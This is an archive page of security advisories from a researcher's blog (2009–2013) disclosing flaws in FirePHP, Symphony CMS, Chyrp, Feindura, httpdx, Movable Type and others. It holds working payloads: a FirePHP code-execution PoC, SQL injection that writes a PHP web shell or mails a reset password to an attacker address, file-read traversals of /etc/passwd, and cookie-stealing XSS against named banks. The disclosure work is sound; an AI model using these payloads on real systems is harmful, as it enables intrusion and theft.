Results tagged “disclosure” from Just Another Hacker

--------------------------------------------------------------------------------------------
20130417 - Justanotherhacker.com : FirePHP firefox plugin remote code execution
JAHx132 - http://www.justanotherhacker.com/advisories/JAHx132.txt
--------------------------------------------------------------------------------------------

FirePHP enables you to log to your Firebug Console using a simple PHP method call.
All data is sent via response headers and will not interfere with the content on your page.
FirePHP is ideally suited for AJAX development where clean JSON and XML responses are required.
[ Taken from: http://www.firephp.org/ ]


--- Vulnerability description ---
The extension does not sufficiently validate cell names in array data received from the remote 
host resulting in arbitrary script execution in the chrome privileged context if a user
inspects the malicious data in firephp.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Remote Code Execution
Severity: High
Release: Responsible
Vendor: FirePHP - http://www.firephp.org/
Affected versions: All versions prior to 0.7.2


--- Proof of Concept ---
<?php
/*************************************************************
 * FirePHP Firefox plugin Remote code execution PoC                            *
 * Written by Wireghoul - http://www.justanotherhacker.com   *
 * Greetz to @bcoles urbanadventurer @malerisch              *
 *************************************************************/

// XUL code to launch calc.exe
$exploit =  '{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>';
$exploit.= 'var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);';
$exploit.= 'lFile.initWithPath(\"C:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\calc.exe\");';
$exploit.= 'var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);';
$exploit.= 'process.init(lFile);';
$exploit.= 'process.run(true,[],0);void(0);';
$exploit.= '<\/SCRIPT>":"PWNT"}}';

// Send FirePHP dump data
header("X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2");
header("X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3");
header("X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1");
$payload= "X-Wf-1-1-1-1: ";
$payload.= strlen($exploit).'|'.$exploit."|\r\n";
header($payload);
?>
<html>
<head>
  <title>FirePHP Firefox plugin RCE PoC</title>
</head>
<body>
PWNT!
</body>
</html>


--- Solution ---
Upgrade to version 0.7.2


--- Disclosure time line ---
17-Apr-2013 - Public disclosure
17-Apr-2013 - New version available via mozilla addons
12-Apr-2013 - New version
12-Apr-2013 - Vendor acknowledge vulnerability
09-Apr-2013 - Vendor notified through email


--------------------------------------------------------------------------------------------
20130212 - Justanotherhacker.com : httpdx multiple access control bypass
JAHx131 - http://www.justanotherhacker.com/advisories/JAHx131.txt
--------------------------------------------------------------------------------------------

Single-process HTTP1.1/FTP server; no threads or processes started per connection, runs with
only few threads. Includes directory listing, virtual hosting, basic auth., support for PHP,
Perl, Python, SSI, etc. All settings in one config/script file.
[ Taken from: http://sourceforge.net/projects/httpdx/ ]


--- Vulnerability description ---
Access control in httpdx is done with string matching directives in the configuration file.
Request variables are compared to static strings to determine if access should be granted.
Examples provided in the default configuration include:
    if<%REQUEST_URI% == "/data/users.txt*">{
        http.deny = 1;
    }
And another example:
    if<%REQUEST_URI% == "/admin.html*">{
        http.auth = { //authorization needed for admin's section
            user="admin",
            pass="passw000",
            realm="Stuff for admin only!"
        };
As long as your request does not match these static strings, but the path resolves to the same
files you can access the content.

Additionally, as the server doesn't support traditional binding of virtualhosts to network
interfaces you must configure virtualhost specific behaviour through similar string matching
directives.
    if<%HTTP_HOST% != "127.0.0.1" && %HTTP_HOST% == {localhost,127.*.*.*}>{
The variable HTTP_HOST is set from the Host: header in the request, so in order to access the
localhost virtualhost remotely, just set your Host: header to localhost.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Access control bypass
Severity: Low
Release: Full disclosure
CVE: None
Vendor: httpdx - http://sourceforge.net/projects/httpdx/
Affected versions: 1.5.5, 1.5.4 and probably earlier versions

--- Proof of Concept ---
The server comes with two examples of access control, a restricted file and a password
protected administrator area running on localhost. The following examples successfully
access these restricted areas remotely:

Access user file:
user@~$ GET http://192.168.58.135/data//users.txt
user1=pass123
user2=pass321

Access admin console:
user@~$ echo -e "GET /%2fadmin.html HTTP/1.1\r\nHost: localhost\r\n\r\n" | nc 192.168.58.135 80
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2012 03:25:58 GMT
Content-Type: text/html
Last-Modified: Mon, 20 Jul 2009 14:03:48 GMT
Content-Length: 36
Connection: close
Server: httpdx/1.5.4 (Win32)
Pragma: no-cache

Ok, you're now at admin's section.


--- Solution ---
The software appears to be abandoned and the same versions suffers from remote code execution
bugs. Use different software instead.

--- Disclosure time line ---
12-Feb-2013 - Public disclosure

--------------------------------------------------------------------------------------------
20121017 - Justanotherhacker.com : Symphony cms - Multiple vulnerabilities
JAHx122 - http://www.justanotherhacker.com/advisories/JAHx122.txt
--------------------------------------------------------------------------------------------

Symphony is an XSLT-powered open source content management system.
[ Taken from: http://getsymphony.com/ ]


--- Vulnerability description ---
Symphony-cms version 2.3 is vulnerable to several vulnerabilities ranging in
severity from low to high and can result in complete compromise by an
unauthenticated attacker.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible
Vendor: Symphony - http://getsymphony.com
Affected versions: 2.3 (and possibly earlier)

--- Local patch disclosure ---
Direct requests to library files will disclose the full local file path if php is configured
to display errors due to the reliance on the library path being declared in a constant
of global scope outside of the library script.

PoC:
http://host/path/symphony/lib/boot/bundle.php

--- User enumeration ---
The retrive password url http://host/path/symphony/login/retrieve-password/ will display a helpful error message if the email address entered does not exist in the database.

--- Authentication token brute force ---
Symphony-cms allows a user to login without entering their username and password via
a remote auth url that contains a token made up of the first 8 characters of a sha1 hash
of the user's username and hashed password.

If a user has auth_token_active set to yes in the sym_authors table an attacker can login to their account by brute forcing a key of [0-9A-F]^8 length.

The url http://host/path/symphony/login/[token]/ ie: http://host/path/symphony/login/a39880be/ for the user "admin" with password "admin".


--- Cross site scripting ---
Reflected:
The email input field supplied to http://host/path/symphony/login/retrieve-password/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
Submit form with email address:
"><script>alert(1)</script>

Reflected:
The email input field supplied to http://host/path/symphony/login/ is not sufficiently filtered for malicious characters resulting in reflected cross site scripting.

PoC:
username=%22%3E%3C%2Finput%3E%3Cscript%3Ealert%28%27k63ddgb6ra%27%29%3C%2Fscript%3E&password=on

Persistent:
The "From name" preference setting in Symphony-cms (http://host/path/symphony/system/preferences/) is not sufficiently encoded resulting in persistent cross site scripting.

PoC:
settings%5Bemail_sendmail%5D%5Bfrom_name%5D=Symphony%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

--- Blind sql injection ---
The username field in the authors detail page is not sufficiently filtered when checking
is the username already exists in the system. Resulting in blind sql injection.

PoC:
Edit an author's profile, update the username to include a malicious payload, ie:
username' union select "<?php @system($_REQUEST['cmd']); ?>" FROM sym_authors INTO OUTFILE '/var/www/workspace/haxed.php
where the path to your outfile is based on the local path disclosure.

--- SQL Injection ---
The "page" number supplied when editing blueprints is vulnerable to sql injection.

We can retrieve a users username, hashed password and auth token status with the following PoC:
http://host/path/symphony/bluePRINTs/pages/edit/0%29+union+select+1,2,username,password,5,auth_token_active,7,8,9+from+sym_authors+where+id+=+1+--+/

--- Unrestricted file upload ---
While this appears to be intended functionality for authorised users, combined
with the aforementioned vulnerabilities it becomes trivial to place a backdoor
on the system.

--- Solution ---
Upgrade to version 2.3.1.

--- Disclosure time line ---
17-Oct-2012 - Public disclosure
03-Oct-2012 - Issues patched in upcoming release
18-Sep-2012 - Patch checked into git
17-Sep-2012 - Vendor response
14-Sep-2012 - Vendor notified through email

--------------------------------------------------------------------------------------------
20120831 - Justanotherhacker.com : PHP Shell Detector - Cross site scripting
JAHx121 - http://www.justanotherhacker.com/advisories/JAHx121.txt
--------------------------------------------------------------------------------------------

PHP Shell Detector is a php script that helps you find and identify php shells. It also has
a "web shells" signature database that helps to identify "web shell" up to 99%. By using the
latest javascript and css technologies, php shell detector has a light weight and friendly
interface. The main features is that if you're not sure about a suspicious file, you may send
it to the websecure.co.il team.  After submitting your file, it will be inspected and if
there are any threats, it will be inserted into a "php shell detector" web shells signature
database and the next time this file will be recognized positively.
[ Taken from: http://www.emposha.com/security/php-shell-detector-web-shell-detection-tool.html ]


--- Vulnerability description ---
The shell detector script does not sufficiently sanitise filenames of detected shells or
suspicious files, resulting in cross site scripting.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Full
CVE: None
Vendor: Emposha - http://www.emposha.com/
Affected versions: 1.51 - earlier versions may also be affected.

--- Proof of Concept ---
Create a payload out of a file detected by the PSD script, ie:
root@localhost:~# mv htaccess.php  \<img\ src\=x\ onerror\=alert\(1\)\>.txt
Then scan the directory containing the renamed file.

--- Solution ---
There is no solution at this time.

--- Disclosure time line ---
31-Aug-2012 - Public disclosure

--------------------------------------------------------------------------------------------
20110713 - Justanotherhacker.com : Chyrp - Multiple vulnerabilties
JAHx113 - http://www.justanotherhacker.com/advisories/JAHx113.txt
--------------------------------------------------------------------------------------------

Chyrp is a blogging engine designed to be very lightweight while retaining functionality. It
is powered by PHP and has very powerful theme and extension engines, so you can personalize
it however you want. The code is well-documented, and it has a very strong structure that's
loosely based on the MVC design pattern
[ Taken from: http://chyrp.net ]


--- Vulnerability description ---
The chyrp blogging engine was found to suffer from multiple vulnerabilities in multiple versions.
Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: High
Release: Responsible, via oCERT
CVE: Not yet assigned
Vendor: chyrp.net
Affected versions: <= 2.1

--- Cross site scripting ---
The action parameter is not sufficiently filtered, escaped or encoded resulting in cross site scripting.
Exploit:
http://domain/path/admin/?action=[XSS]
http://domain/path/includes/javascript.php?action=[XSS]
PoC:
The javascript.php xss can also be invoked through rewrite rules using the following querystring -
http://domain/path/?%22%3E%3C/script%3E%3Cscript%3Ealert(1)%3C/script%3E;url=blah

--- Cross site scripting ---
The title and body parameters are not initialized in the admin/help.php file resulting in cross site
scripting if register globals is on.
Exploit:
http://domain/path/admin/help.php?title=[XSS]&body=[XSS]

--- Local file inclusion ---
The action parameter is not sufficiently filtered and vulnerable to local file inclusion.
Exploit:
http://domain/path/?action=[LFI]
PoC:
http://domain/path/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00

--- Directory traversal ---
The file parameter for includes/lib/gz.php is vulnerable to a directory traversal bug in Chyrp versions <=2.0.
This is due to a php gotcha when using the return value of strpos in an if statement as matches on position 0
will result in a false negative.
Exploit:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../[PATH]
PoC:
http://domain/path/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
http://domain/path/includes/lib/gz.php?file=/themes/../includes/config.yaml.php


--- Arbitrary file upload ---
Arbitrary file upload can be done by authorised users in Chyrp version <= 2.0 with the swfupload extension and
file upload feathers enabled. The uploaded file extension is restricted through javascript. Modify js in page
using firebug or via intercepting proxy to allow *.php upload. A direct POST to
http://domain/path/modules/swfupload/upload_handler.php can also be done, but changing js is far easier.

PoC:
Appended ;*.php in script for the add photo feather (http://domain/path/admin/?action=write_post&feather=photo) using intercepting proxy
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://localhost/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://localhost/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",

file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>

--- Solution ---
Upgrade to version 2.1.1

--- Disclosure time line ---
13-Jul-2011 - Public disclosure
17-May-2011 - Vendor notified
17-May-2011 - oCERT notified

--------------------------------------------------------------------------------------------
20110525 - Justanotherhacker.com : Cross site scripting in Movable Type
JAHx112 - http://www.justanotherhacker.com/advisories/JAHx112.txt
--------------------------------------------------------------------------------------------

Movable Type is a professional publishing platform
[ Taken from: http://www.movabletype.org ]


--- Vulnerability description ---
The 'static' parameter to the comment script is not sufficiently sanitised which allows an attacker
to break out of the meta redirect url in the response, resulting in a cross site scripting attack.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Cross Site Scripting
Severity: Low
Release: Responsible
CVE: Unassigned
Movable Type BugID: #105441
Vendor: Six Apart Ltd - http://www.sixapart.com
Affected versions:
* Movable Type Open Source 4.x
* Movable Type Open Source 5.x
* Movable Type 4.x ( with Professional Pack, Community Pack )
* Movable Type 5.x ( with Professional Pack, Community Pack )
* Movable Type Enterprise 4.x


--- Proof of Concept ---
http://vuln.com/cgi-bin/mt-comment.cgi?__mode=handle_sign_in&static="><script>alert(document.cookie)</script>&logout=1&entry_id=


--- Solution ---
Upgrade to the latest versions of Movable Type 4 or Movable Type 5.
* Movable Type Open Source 4.36
* Movable Type Open Source 5.05
* Movable Type Open Source 5.1
* Movable Type 4.36( with Professional Pack, Community Pack)
* Movable Type 5.05( with Professional Pack, Community Pack)
* Movable Type 5.1( with Professional Pack, Community Pack)
* Movable Type Enterprise 4.36
* Movable Type Advanced 5.1

--- Disclosure time line ---
25-May-2011 - Advisory released
24-May-2011 - New version released
18-May-2011 - Patch produced
11-Jan-2011 - Vendor acknowledge vulnerability
08-Jan-2011 - Vendor notified through email

--------------------------------------------------------------------------------------------
20110424 - Justanotherhacker.com : Symphony-cms blind sql injection
JAHx111 - http://www.justanotherhacker.com/advisories/JAHx111.txt
--------------------------------------------------------------------------------------------

Symphony is a web-based content management system (CMS) that enables users to create and
manage websites and web applications of all shapes and sizes?from the simplest of blogs to
bustling news sites and feature-packed social networks.
[ Taken from: http://symphony-cms.com/ ]


--- Vulnerability description ---
The symphony cms login page does not sufficiently filter user supplied variables used in a
SQL statement, resulting in a blind sql injection vulnerability. The vulnerable code is located at:
content.login.php-270-$sql = "SELECT t1.`id`, t1.`email`, t1.`first_name`
content.login.php-271- FROM `tbl_authors` as t1, `tbl_forgotpass` as t2
content.login.php:272: WHERE t2.`token` = '".$_REQUEST['token']."' AND t1.`id` = t2.`author_id`
content.login.php-273- LIMIT 1";
content.login.php-274-
content.login.php-275-$author = Symphony::Database()->fetchRow(0, $sql);

Discovered by: Eldar "Wireghoul" Marcussen
Type: Blind sql injection
Severity: Moderate
Release: Full
CVE: None
Vendor: Symphony-cms
Affected versions: 2.1.2 and possibly older versions

--- Proof of Concept ---
The following example will reset the password of the admin user which was created during installation
(id 1) and send an email to 'evil@email.com' with the username and new password.
http://example.com/symphony/login/?action=resetpass&token=-1'+union+select+id,'evil@email.com',username+from+tbl_authors+where+id+=1+--+

We are aided by the following code:
lib/toolkit/class.mysql.php:251:if($this->_connection['tbl_prefix'] != 'tbl_'){
lib/toolkit/class.mysql.php:252: $query = preg_replace('/tbl_(\S+?)([\s\.,]|$)/', $this->_connection['tbl_prefix'].'\\1\\2', $query);
Which turn our tbl_authors into the appropriate prefixed table name. This essentially negates the use
of custom prefix for tables.

--- Solution ---
Upgrade to version 2.2

--- Disclosure time line ---
24-Apr-2011 - Public disclosure
--------------------------------------------------------------------------------------------
20101028 - Justanotherhacker.com : Multiple vulnerabilities in Feindura CMS
JAHx104 - http://www.justanotherhacker.com/advisories/JAHx104.txt
--------------------------------------------------------------------------------------------


Feindura is a Open Source flat file based Content Management System for Web Designers,
written in PHP. There is no need of a database and it's easy to integrate in your Websites
[ Taken from: http://feindura.org ]

--- Vulnerability description ---
Feindura CMS sufferes from multiple vulnerabilities.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Multiple
Severity: Medium
Release: Responsible
Affected versions: <= 1.0rc

--- Cross site scripting ---
The category parameter provided to editor.php is not sufficiently filtered and is vulnerable to cross site scripting.
Looking at the source we can see the variable gets assigned direclty from user input and later used in output.
library/sites/editor.php:24   $category = $_GET['category'];
library/sites/editor.php:186  echo '<form action="'.$_SERVER['PHP_SELF'].'?category='.$category.'&amp;page='.$page.'" method="post" accept-charset="UTF-8" id="editorForm">
Exploit:
http://[host]/[path]/library/sites/editor.php?category=[XSS]
PoC:
http://demo.feindura.org/library/sites/editor.php?category=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

--- Local file inclusion ---
The download.php script does not apply base path restrictions on the filename, this allows for arbitrary file reads.
library/process/download.php:22 header('Content-Type: x-type/subtype'); //"Bug-Fix" für den IE 4.x &
 5.x
library/process/download.php:23
library/process/download.php:24 readfile(DOCUMENTROOT.$adminConfig['savePath'].$_GET['group
'].'/'.$_GET['filename']);
Exploit:
http://[host]/[path]/library/process/download.php?filename=[path/to/file]
PoC:
http://demo.feindura.org/library/process/download.php?filename=../../../../../../../etc/passwd

--- Local file inclusion ---
The filemanager script does not apply base path restrictions on the path, this allows for arbitrary file reads.
The vulnerable code is as follows:
library/thirdparty/filemanager/connectors/php/filemanager.php:72                   case 'download':
library/thirdparty/filemanager/connectors/php/filemanager.php:73                           if($fm->getvar('path')) {
library/thirdparty/filemanager/connectors/php/filemanager.php:74                                   $fm->download();
library/thirdparty/filemanager/connectors/php/filemanager.php-75                           }
library/thirdparty/filemanager/connectors/php/filemanager.class.php:245    public function download() {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-246            if(isset($this->get['path']) && file_exists($_SERVER['DOCUMENT_ROOT'] . $this->get['path'])) {
library/thirdparty/filemanager/connectors/php/filemanager.class.php:247                    header("Content-type: application/force-downloa ");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-248                    header('Content-Disposition: inline; filename="' . $_SERVER['DOCUMENT_ROOT'] . $this->get['path'] . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-249                    header("Content-Transfer-Encoding: Binary");
library/thirdparty/filemanager/connectors/php/filemanager.class.php-250                    header("Content-length: ".filesize($_SERVER['DOCUMENT_ROOT'] . $this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-251                    header('Content-Type: application/octet-stream');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-252                    $tmp = explode('/',$this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-253                    $filename = $tmp[(sizeof($tmp)-1)];
library/thirdparty/filemanager/connectors/php/filemanager.class.php-254                    header('Content-Disposition: attachment; filename="' . $filename . '"');
library/thirdparty/filemanager/connectors/php/filemanager.class.php-255                    readfile($_SERVER['DOCUMENT_ROOT'] . $this->get['path']);
library/thirdparty/filemanager/connectors/php/filemanager.class.php-256            } else {
library/thirdparty/filemanager/connectors/php/filemanager.class.php-257                    $this->error(sprintf($this->lang('FILE_DOES_NOT_EXIST'),$this->get['path']));
library/thirdparty/filemanager/connectors/php/filemanager.class.php-258            }
library/thirdparty/filemanager/connectors/php/filemanager.class.php-259    }
Exploit:
http://[host]/[path]/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=[path/to/file]
PoC:
http://demo.feindura.org/library/thirdparty/filemanager/connectors/php/filemanager.php?mode=download&path=/../../../../../../../../etc/passwd

--- Local file inclusion ---
Language selection code does not sufficiently filter the supplied variable, resulting arbitrary file reads and code execution.
Vulnerable code:
index.php:26 include("library/backend.include.php");
library/backend.include.php:46 if(isset($_GET['language']))
library/backend.include.php:47   $_SESSION['language'] = $_GET['language'];
library/backend.include.php-56 // includes the langFile which is set by the session var
library/backend.include.php:57 $langFile = include(dirname(__FILE__).'/lang/'.$_SESSION['language'].'.backend.php');
library/backend.include.php-58
Exploit:
http://[host]/[path]/?language=../../../../../../../etc/passwd%00
PoC:
http://demo.feindura.org/?language=../../../../../../../etc/passwd%00

--- Solution ---
Password protect your feindura installation.
These issues are fixed in the coming 1.1 version.

--- Disclosure time line ---
28-Oct-2010 - Public disclosure
18-Oct-2010 - Vendor response
18-Oct-2010 - Vendor notified through email

--------------------------------------------------------------------------------------------
20100625 - Justanotherhacker.com : Multiple vulnerabilities in maiacms
JAHx103 - http://www.justanotherhacker.com/advisories/JAHx103.txt
--------------------------------------------------------------------------------------------

MaiaCMS is an open source PHP based content management system (CMS). It is designed with simplicity in mind to help you easily build and maintain your web site. It is freely available to everyone.
[ Taken from: http://maiacms.sourceforge.net/ ]

--- Vulnerability description ---
Multiple vulnerabilities exist in maiacms, here are some of them.

Discovered by: Eldar "Wireghoul" Marcussen
Severity: Low
Release: Full disclosure
Affected versions: 0.1

--- SQL injection ---
The index.php script does not properly sanitize the page parameter, resulting in several paths to SQL injection.
PoC:
/index.php?page=1' or 'a'='a

--- Local file inclusion ---
The admin/index.php script does not properly sanitize the com or file parameters, resulting in local file inclusion.
PoC:
/admin/index.php?com=../../../../../../../../etc/passwd%00

--- Authentication bypass ---
Most of the admin pages has a check and redirect to login snippet to validate login:
list_pages.php:1:<?php
list_pages.php:2:    require ("../includes/connections.php"); //Includes functions and database connection
list_pages.php:3:    
list_pages.php:4:    if (empty($is_admin)) {
list_pages.php:5:        header("Location: login.php");
list_pages.php:6:    }
However it does not halt execution after the header redirect. This allows code to be executed past the point of redirection.

PoC:
curl 'http://maiacms.sourceforge.net/admin/list_pages.php?id=1&category=1'

--- Session control ---
The script update_session.php relies on the the aforementioned access control weakness and allows the session data to be changed or created directly through a HTTP POST operation.
update_session.php:1:<?php
update_session.php:2:require_once("../includes/connections.php");
update_session.php:3:
update_session.php:4:if (empty($is_admin)) {
update_session.php:5:        header("Location: /admin/login.php");
update_session.php:6:    }
update_session.php:7:    
update_session.php:8:foreach ($_POST as $key => $value) {
update_session.php:9:    $_SESSION[$key] = $value;
update_session.php:10:}
update_session.php:11:
update_session.php:12:$db->Close();
update_session.php:13:?>

--- Solution ---
Wait for the next or non alpha release

--- Disclosure time line ---
25-Jun-2010 - Public disclosure
25-Jun-2010 - Vendor notified through email
25-Jun-2010 - Vendor response

--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : HuskiCMS local file inclusion
JAHx102 - http://www.justanotherhacker.com/advisories/JAHx102.txt
--------------------------------------------------------------------------------------------

HuskiCMS
huski CMS effectively places the control of the website back into the hands of you, the site owner. huski CMS is extremely user friendly and has been developed with the lowest denominator in IT knowledge in mind. huski CMS is still a very powerful and flexible system which ensures your site is using the latest technologies such as AJAX, XML, XHTML, and CSS
[ Taken from: http://www.huskicms.com ]


--- Vulnerability description ---
A conditional local file inclusion exists in the image resizing script size.php's i parameter.
The parameter is not filtered and allows arbitrary file inclusion.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Local File Inclusion
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Proof of Concept ---
~$ GET 'http://[target]/size.php?i=index.php'
<?php
    header ('Content-Type: text/html; charset=utf-8');
    // Data Includes
    include_once "PHPLib/db_mysql.inc";
    include_once "Data/dbConnection.class.php";
    include_once "Data/dbConfig.class.php";
    include_once "Data/dataAdapter.class.php";
    include_once "Quicksite/Core/domxml.class.php";


    // Quicksite Core Includes
    include_once "Quicksite/Core/all.inc.php";
    
    // Configuration
    include_once "Quicksite/db.config.php";
    include_once "inc/vars.config.php";

    // Initialise the Site
    $site = new Site($_VARS['site']);
    print_r($_SESSION['login']);
    // Initialise the Page
    $page = new Page($site, $_GET['id'], array_merge($_POST, $_GET));

    // Load plugin sources
    $page->loadPluginSources();
   
    // Create the Page
    $page->createPage();
   
    echo $page->Result;
?>


--- Solution ---
Upgrade to a more recent version

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email
 
--------------------------------------------------------------------------------------------
20100205 - Justanotherhacker.com : Huski retail mulitple SQL injection vulnerabilities
JAHx101 - http://www.justanotherhacker.com/advisories/JAHx101.txt
--------------------------------------------------------------------------------------------

Huski Retail
Ascet Interactive offers you a very simple and cost effective method of selling goods and services online. Ascet Interactive provides you with a catalogue targeted at your customers, whether they are retail customers or your dealer network. Imagine being able to save on printing, faxing and administration costs by making your whole product range available at anytime via the Web.
[ Taken from: http://www.ascetinteractive.com/?id=huskiretail ]


--- Vulnerability description ---
The categoryID and productID parameters used in several pages are not sufficiently sanitised, leading to SQL injection.

Discovered by: Eldar "Wireghoul" Marcussen
Type: SQL Injection
Severity: Low
Release: Responsible
CVE: None
Vendor: ASCET Interactive - http://www.ascetinteractive.com
Affected versions:
Unknown

--- Exploit URI ---
http://[target]/[path]/?_action=editProducts&categoryID=[SQLI]

http://[target]/[path]/?_action=showProducts&categoryID=[SQLI]&id=shop

http://[target]/[path]/?_action=showProductDetails&productID=[SQLI]&categoryID=1310&id=shop

http://[target]/[path]/?_action=showProductDetails&productID=22095&categoryID=[SQLI]&id=shop


--- Solution ---
Contact the vendor for a fix

--- Disclosure time line ---
05-Feb-2010 - Public disclosure
29-Jan-2010 - Vendor acknowledge vulnerability
28-Jan-2010 - Vendor notified through email

Bank of Queensland XSS

|

ING XSS

|
I found a XSS vulnerability in ING's australian website; ING - XSS - PoC.jpg
The proof of concept url used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

XSS defacement mirror

|
Since xssed.org appears to be out of action there seems to be a need for an active xss defacement mirror. Some alternatives exist, such as the original XSS disclosure thread on sla.ckers.org or http://bugtraq.byethost22.com/. However these two sites don't offer the ease of use that xssed.org did with reporting xss.

If xssed.org cannot be brought back to life, this is what I would like to see in a defacement mirror:

  • Ability to submit post and cookie data or even tamper data xml
  • Automatic screen/browser-shot of the hole
  • Some level of community control to minimize the number of holes that needs to be moderated by admins
  • Automatic notification to the domain owner using postmaster, hostmaster, abuse, etc
  • Status indicator (validated, fixed, etc)
  • Automatic submission and validation by script src=http://xss-mirror/subandvalidate.js?username or similar technique
  • Published statistics; users, vulns, fixed, etc
I understand that there might be a business model involved here and things might not turn out quite like I had wished. Hopefully someone will take up the torch and either bring xssed back to life or start a new site to fill the gap left behind.
Westpac is so far the only bank I have tested which didn't filter their search field. Needless to say the smell of an xss casualty brings the zombies around..

westpac-xss-poc.png
The hole has been patched by westpac now. The url was:
http://search.westpac.com.au/search/search.cgi?collection=westpac&query=%3Cscript%3Ealert%28String.fromCharCode%2890,111,109,98,105,101,115,32,97,116,101,32,109,121,32,109,111,110,101,121,33%29%29%3C/script%3E&x=0&y=0

Pack of xss

|
I had some spare time last weekend and decided to go XSS hunting. Yeah I know old news, old vectors, boooring...

Unfortunately even though XSS is old news in the security community and there are well established techniques to mitigate the attack it is still ridiculously easy to find XSS vulnerabilities in most websites today. It seems the message isn't getting through.

Get all the details after the break, or use the quick links below

businessday.com.au
carsguide.com.au
conceptart.org
investsmart.com.au
mycareer.com.au
news.com.au
reuters.com
stays.com.au
three.com.au
thebigchair.com.au

--------------------------------------------------------------------------------------------
20091106 - Justanotherhacker.com : Vircom vopmail / modusmail  information disclosure
JAHx091 - http://www.justanotherhacker.com/advisories/JAHx091.txt
--------------------------------------------------------------------------------------------

modusMail
All in one email security solution

The modusMail™ mail server provides all-in-one email services, messaging security and spam protection.
[ Taken from: http://www.vircom.com/en/products/modusmail/ ]


--- Vulnerability description ---
A conditional information disclosure exists in older versions of modusMail and Vopmail that will disclose whether an email account exists or not. The disclosure is conditional upon the presence of a @ or % character in the username. This is usually used when one mail system is responsible for the email of several domains. If the @ or % character was not present in the username the pop3 server would request a password before rejecting the login, as opposed to aborting the login attempt after receiving the user portion of the login.

Discovered by: Eldar "Wireghoul" Marcussen
Type: Information disclosure
Severity: Low
Release: Responsible
CVE: None
Vendor: Vircom - http://www.vircom.com
Affected versions:
Modus mail <= 4.4.491
Probably all versions of Vopmail


--- Proof of Concept ---
~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:37819600.1156428713.245@vircom.com>
<37819600.1156428713.245@vircom.com>
user nosuchuserhere
+OK nosuchuserhere is welcome here
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.

~$ telnet pop.vircom.com 110
Trying 64.18.73.12...
Connected to gate.vircom.com.
Escape character is '^]'.
+OK modusMail POP3 Server 4.4.491.0 Ready
<mailto:36899224.1156429893.504@vircom.com>
<36899224.1156429893.504@vircom.com>
user nosuchuser@nosuchhost.com
-ERR nosuchuser@nosuchhost.com not known
user nosuchuser%nosuchhost.com
-ERR nosuchuser%nosuchhost.com not known
quit
+OK vircom.com POP3 server signing off (mailbox empty)
Connection closed by foreign host.



--- Solution ---
Upgrade to a more recent version


--- Disclosure time line ---
06-Nov-2009 - Public disclosure
15-Sep-2006 - New version of modusMail mitigate this
26-Aug-2009 - Vendor acknowledge problem
19-Aug-2006 - Vendor notified through email
No Clean Feed - Stop Internet Censorship in Australia
Creative Commons License
This weblog is licensed under a Creative Commons License.